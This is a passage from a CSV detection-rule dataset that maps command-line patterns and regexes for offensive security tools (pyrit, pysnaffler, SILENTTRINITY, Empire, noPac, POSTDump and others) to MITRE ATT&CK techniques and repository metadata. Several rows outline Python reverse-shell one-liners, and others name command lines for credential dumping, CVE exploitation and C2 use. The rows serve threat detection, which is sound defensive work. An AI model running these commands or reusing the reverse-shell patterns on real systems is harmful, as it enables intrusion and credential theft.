tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pyrit -i *.txt import_passwords*",".{0,1000}pyrit\s\-i\s.{0,1000}\.txt\simport_passwords.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pyrit -r *.pcap attack_db*",".{0,1000}pyrit\s\-r\s.{0,1000}\.pcap\sattack_db.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pyrit -r *.pcap -b * -i *.txt attack_passthrough*",".{0,1000}pyrit\s\-r\s.{0,1000}\.pcap\s\-b\s.{0,1000}\s\-i\s.{0,1000}\.txt\sattack_passthrough.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pysnaffler -*",".{0,1000}pysnaffler\s\-.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*pysnaffler 'smb2+kerberos+password:*",".{0,1000}pysnaffler\s\'smb2\+kerberos\+password\:.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*pysnaffler 'smb2+ntlm-nt://*",".{0,1000}pysnaffler\s\'smb2\+ntlm\-nt\:\/\/.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*pysnaffler 'smb2+ntlm-password://*",".{0,1000}pysnaffler\s\'smb2\+ntlm\-password\:\/\/.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*pysnaffler.whatif:main*",".{0,1000}pysnaffler\.whatif\:main.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*pysnaffler/_version.py*",".{0,1000}pysnaffler\/_version\.py.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*pysnaffler-main*",".{0,1000}pysnaffler\-main.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*pysoserial.py*",".{0,1000}pysoserial\.py.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*Pysoserial-main*",".{0,1000}Pysoserial\-main.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*pysoxy-master*",".{0,1000}pysoxy\-master.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","0","N/A","10","10","118","47","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z" "*PySplunkWhisperer2*",".{0,1000}PySplunkWhisperer2.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*pystinger_for_darkshadow*",".{0,1000}pystinger_for_darkshadow.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*python 3 st teamserver *",".{0,1000}python\s3\sst\steamserver\s.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*python -c*'import socket,subprocess,os'*socket.socket(socket.AF_INET*connect((""*))*dup2*pty.spawn(""sh"")'*",".{0,1000}python\s\-c.{0,1000}\'import\ssocket,subprocess,os\'.{0,1000}socket\.socket\(socket\.AF_INET.{0,1000}connect\(\(\"".{0,1000}\)\).{0,1000}dup2.{0,1000}pty\.spawn\(\""sh\""\)\'.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""/bin/bash"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""\/bin\/bash\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""/bin/sh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""\/bin\/sh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""bash"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""bash\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""cmd"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""cmd\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""powershell"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""powershell\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""pwsh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""pwsh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""sh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""sh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""zsh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""zsh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python dkmc.py*",".{0,1000}python\sdkmc\.py.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*python kraken.py -*",".{0,1000}python\skraken\.py\s\-.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","10","10","495","48","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z" "*python -m orbitaldump *",".{0,1000}python\s\-m\sorbitaldump\s.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","453","89","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*python -m peas -u *",".{0,1000}python\s\-m\speas\s\-u\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*python -m rarce *",".{0,1000}python\s\-m\srarce\s.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*python main.py --KEY=* --URL=*127.0.0.1*",".{0,1000}python\smain\.py\s\-\-KEY\=.{0,1000}\s\-\-URL\=.{0,1000}127\.0\.0\.1.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*python noPac.*",".{0,1000}python\snoPac\..{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*python raiseChild.py -*",".{0,1000}python\sraiseChild\.py\s\-.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*python reuse.py --start --rhost * --rport *",".{0,1000}python\sreuse\.py\s\-\-start\s\-\-rhost\s.{0,1000}\s\-\-rport\s.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*python rsf.py*",".{0,1000}python\srsf\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*python scshell*",".{0,1000}python\sscshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*python st.py*",".{0,1000}python\sst\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*python tinar.py*",".{0,1000}python\stinar\.py.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","N/A","9","10","61","20","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*python* -c 'import os,pty,socket*socket.socket()*s.connect(*",".{0,1000}python.{0,1000}\s\-c\s\'import\sos,pty,socket.{0,1000}socket\.socket\(\).{0,1000}s\.connect\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python* -c 'import socket,subprocess,os;*socket.socket(socket.AF_INET,socket.SOCK_STREAM)*.connect(*",".{0,1000}python.{0,1000}\s\-c\s\'import\ssocket,subprocess,os\;.{0,1000}socket\.socket\(socket\.AF_INET,socket\.SOCK_STREAM\).{0,1000}\.connect\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python* pachine.py*",".{0,1000}python.{0,1000}\spachine\.py.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","268","38","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" "*python*charlotte.py*",".{0,1000}python.{0,1000}charlotte\.py.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*python*http://*:6970/ConfigFileCacheList.txt*",".{0,1000}python.{0,1000}http\:\/\/.{0,1000}\:6970\/ConfigFileCacheList\.txt.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*python*'http://*SEP*:6970/*.cnf.xml*",".{0,1000}python.{0,1000}\'http\:\/\/.{0,1000}SEP.{0,1000}\:6970\/.{0,1000}\.cnf\.xml.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*python*https://*:8443/cucm-uds/users?name=*",".{0,1000}python.{0,1000}https\:\/\/.{0,1000}\:8443\/cucm\-uds\/users\?name\=.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*python_modules/keyboard.zip*",".{0,1000}python_modules\/keyboard\.zip.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1100","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*python2??/generator.py*",".{0,1000}python2\?\?\/generator\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*python2??/PyLoader.py*",".{0,1000}python2\?\?\/PyLoader\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*python3 ./exp.py --url http://*",".{0,1000}python3\s\.\/exp\.py\s\-\-url\shttp\:\/\/.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","0","N/A","N/A","4","393","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" "*python3 dump-restore.py *.dmp --type restore*",".{0,1000}python3\sdump\-restore\.py\s.{0,1000}\.dmp\s\-\-type\srestore.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*python3 